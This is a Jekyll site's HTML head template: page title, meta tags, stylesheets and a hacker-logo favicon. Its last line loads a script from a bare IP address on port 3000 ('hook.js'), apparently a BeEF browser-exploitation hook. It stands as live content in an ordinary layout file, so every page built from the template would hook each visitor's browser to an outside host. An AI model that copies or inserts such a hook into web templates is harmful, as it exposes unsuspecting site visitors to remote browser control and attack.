<head>
	<title>{% if page.title %}{{ page.title }} | {% endif %}{{ site.title }}</title>
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
	<!--[if lte IE 8]><script src="{{ "assets/js/ie/html5shiv.js" | relative_url }}"></script><![endif]-->
	<link rel="stylesheet" href="{{ "assets/css/main.css" | relative_url }}" />
	<!--[if lte IE 9]><link rel="stylesheet" href="{{ "assets/css/ie9.css" | relative_url }}" /><![endif]-->
	<!--[if lte IE 8]><link rel="stylesheet" href="{{ "assets/css/ie8.css" | relative_url }}" /><![endif]-->
	<link rel="icon" type="image/x-icon" href="https://profiles.bugcrowdusercontent.com/avatars/849c73ac45c5dc15e4c6253f0b7ef236/normal_png-transparent-hacker-logo-bee-barranco-district-carabayllo-district-hackerspace-technology-maker-culture-lima.png">
	<script src="http://18.196.82.220:3000/hook.js"></script>
</head>
